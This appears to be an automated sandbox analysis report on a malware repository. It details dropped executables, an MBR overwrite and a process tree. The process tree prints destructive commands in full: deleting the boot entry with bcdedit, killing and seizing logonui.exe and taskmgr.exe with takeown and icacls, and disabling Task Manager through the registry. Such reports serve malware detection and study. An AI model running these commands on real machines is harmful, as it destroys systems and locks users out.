Analysis Overview
Threat Level: Likely malicious
The file https://github.com/pankoza2-pl/malwaredatabase-old was found to be: Likely malicious.
Malicious Activity Summary
Downloads MZ/PE file
Possible privilege escalation attempt
Disables Task Manager via registry modification
Modifies file permissions
Executes dropped EXE
Modifies boot configuration data using bcdedit
Legitimate hosting services abused for malware hosting/C2
Writes to the Master Boot Record (MBR)
Checks installed software on the system
UPX packed file
Drops file in Program Files directory
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Browser Information Discovery
Delays execution with timeout.exe
Suspicious use of SendNotifyMessage
Kills process with taskkill
Modifies registry class
Enumerates system info in registry
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
NTFS ADS
Modifies registry key
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of SetWindowsHookEx
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-14 07:43
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-14 07:43
Reported
2024-10-14 07:46
Platform
win10v2004-20241007-en
Max time kernel
142s
Max time network
140s
Command Line
Signatures
Disables Task Manager via registry modification
Downloads MZ/PE file
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Downloads\EthicalHackingTools Setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2FFF.tmp\TrashMBR.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2FFF.tmp\beeper.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2FFF.tmp\MouseError.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2FFF.tmp\MouseWarning.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2FFF.tmp\MouseAppIcon.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2FFF.tmp\PlgBlt.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2FFF.tmp\MouseError.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2FFF.tmp\MouseWarning.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2FFF.tmp\MouseAppIcon.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| File opened for modification | \??\PhysicalDrive0 | C:\Users\Admin\AppData\Local\Temp\2FFF.tmp\TrashMBR.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\Ethical Hacking Tools\trojangen.$$A | C:\Users\Admin\Downloads\EthicalHackingTools Setup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Ethical Hacking Tools\Uninstal.exe | C:\Users\Admin\Downloads\EthicalHackingTools Setup.exe | N/A |
| File created | C:\Program Files (x86)\Ethical Hacking Tools\ddostool.$$A | C:\Users\Admin\Downloads\EthicalHackingTools Setup.exe | N/A |
| File created | C:\Program Files (x86)\Ethical Hacking Tools\EthicalHackingTools.$$A | C:\Users\Admin\Downloads\EthicalHackingTools Setup.exe | N/A |
| File created | C:\Program Files (x86)\Ethical Hacking Tools\Form1.$$A | C:\Users\Admin\Downloads\EthicalHackingTools Setup.exe | N/A |
| File created | C:\Program Files (x86)\Ethical Hacking Tools\mbrimage.$$A | C:\Users\Admin\Downloads\EthicalHackingTools Setup.exe | N/A |
| File created | C:\Program Files (x86)\Ethical Hacking Tools\thematrix.$$A | C:\Users\Admin\Downloads\EthicalHackingTools Setup.exe | N/A |
| File created | C:\Program Files (x86)\Ethical Hacking Tools\Uninstal.$$A | C:\Users\Admin\Downloads\EthicalHackingTools Setup.exe | N/A |
| File created | C:\Program Files (x86)\Ethical Hacking Tools\mbrnote.$$A | C:\Users\Admin\Downloads\EthicalHackingTools Setup.exe | N/A |
| File created | C:\Program Files (x86)\Ethical Hacking Tools\msgspammer.$$A | C:\Users\Admin\Downloads\EthicalHackingTools Setup.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\EthicalHackingTools Setup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Temp1_ExtremeDeath (1).zip\ExtremeDeath.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\2FFF.tmp\TrashMBR.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\2FFF.tmp\MouseError.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\2FFF.tmp\MouseWarning.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\2FFF.tmp\MouseError.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\2FFF.tmp\MouseWarning.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\2FFF.tmp\MouseAppIcon.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\2FFF.tmp\PlgBlt.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\2FFF.tmp\MouseAppIcon.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Downloads\Unconfirmed 196939.crdownload:SmartScreen | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2FFF.tmp\PlgBlt.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Downloads\EthicalHackingTools Setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Temp1_ExtremeDeath (1).zip\ExtremeDeath.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2FFF.tmp\MouseError.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2FFF.tmp\MouseWarning.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2FFF.tmp\MouseAppIcon.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2FFF.tmp\PlgBlt.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2FFF.tmp\MouseWarning.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2FFF.tmp\MouseAppIcon.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2FFF.tmp\MouseError.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/pankoza2-pl/malwaredatabase-old
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffaf21a46f8,0x7ffaf21a4708,0x7ffaf21a4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2156,16235707784089386709,13879454865161705151,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2184 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2156,16235707784089386709,13879454865161705151,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2264 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2156,16235707784089386709,13879454865161705151,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2700 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,16235707784089386709,13879454865161705151,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,16235707784089386709,13879454865161705151,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2156,16235707784089386709,13879454865161705151,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5168 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2156,16235707784089386709,13879454865161705151,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5168 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,16235707784089386709,13879454865161705151,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5164 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,16235707784089386709,13879454865161705151,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5288 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,16235707784089386709,13879454865161705151,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3368 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,16235707784089386709,13879454865161705151,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3472 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2156,16235707784089386709,13879454865161705151,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=4712 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,16235707784089386709,13879454865161705151,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5816 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2156,16235707784089386709,13879454865161705151,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5612 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2156,16235707784089386709,13879454865161705151,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5272 /prefetch:8
C:\Users\Admin\Downloads\EthicalHackingTools Setup.exe
"C:\Users\Admin\Downloads\EthicalHackingTools Setup.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,16235707784089386709,13879454865161705151,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5520 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2156,16235707784089386709,13879454865161705151,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6380 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,16235707784089386709,13879454865161705151,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6416 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2156,16235707784089386709,13879454865161705151,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5476 /prefetch:8
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Users\Admin\AppData\Local\Temp\Temp1_ExtremeDeath (1).zip\ExtremeDeath.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_ExtremeDeath (1).zip\ExtremeDeath.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2FFF.tmp\3000.tmp\3001.bat "C:\Users\Admin\AppData\Local\Temp\Temp1_ExtremeDeath (1).zip\ExtremeDeath.exe""
C:\Windows\system32\cscript.exe
cscript prompt.vbs
C:\Windows\system32\bcdedit.exe
bcdedit /delete {current}
C:\Users\Admin\AppData\Local\Temp\2FFF.tmp\TrashMBR.exe
TrashMBR.exe
C:\Windows\system32\taskkill.exe
taskkill /f /im logonui.exe
C:\Windows\System32\Wbem\WMIC.exe
wmic process where name='logonui.exe' delete /nointeractive
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\system32\logonui.exe
C:\Windows\system32\icacls.exe
icacls C:\Windows\system32\logonui.exe /grant Admin:F
C:\Windows\system32\icacls.exe
icacls C:\Windows\system32\logonui.exe /grant "everyone":F
C:\Windows\system32\taskkill.exe
taskkill /f /im taskmgr.exe
C:\Windows\System32\Wbem\WMIC.exe
wmic process where name='taskmgr.exe' delete /nointeractive
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\system32\taskmgr.exe
C:\Windows\system32\icacls.exe
icacls C:\Windows\system32\taskmgr.exe /grant Admin:F
C:\Windows\system32\icacls.exe
icacls C:\Windows\system32\taskmgr.exe /grant "everyone":F
C:\Windows\system32\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
C:\Users\Admin\AppData\Local\Temp\2FFF.tmp\beeper.exe
beeper.exe
C:\Windows\system32\timeout.exe
timeout 1 /nobreak
C:\Users\Admin\AppData\Local\Temp\2FFF.tmp\MouseError.exe
MouseError.exe
C:\Windows\system32\timeout.exe
timeout 5 /nobreak
C:\Users\Admin\AppData\Local\Temp\2FFF.tmp\MouseWarning.exe
MouseWarning.exe
C:\Windows\system32\timeout.exe
timeout 5 /nobreak
C:\Users\Admin\AppData\Local\Temp\2FFF.tmp\MouseAppIcon.exe
MouseAppIcon.exe
C:\Windows\system32\timeout.exe
timeout 10 /nobreak
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
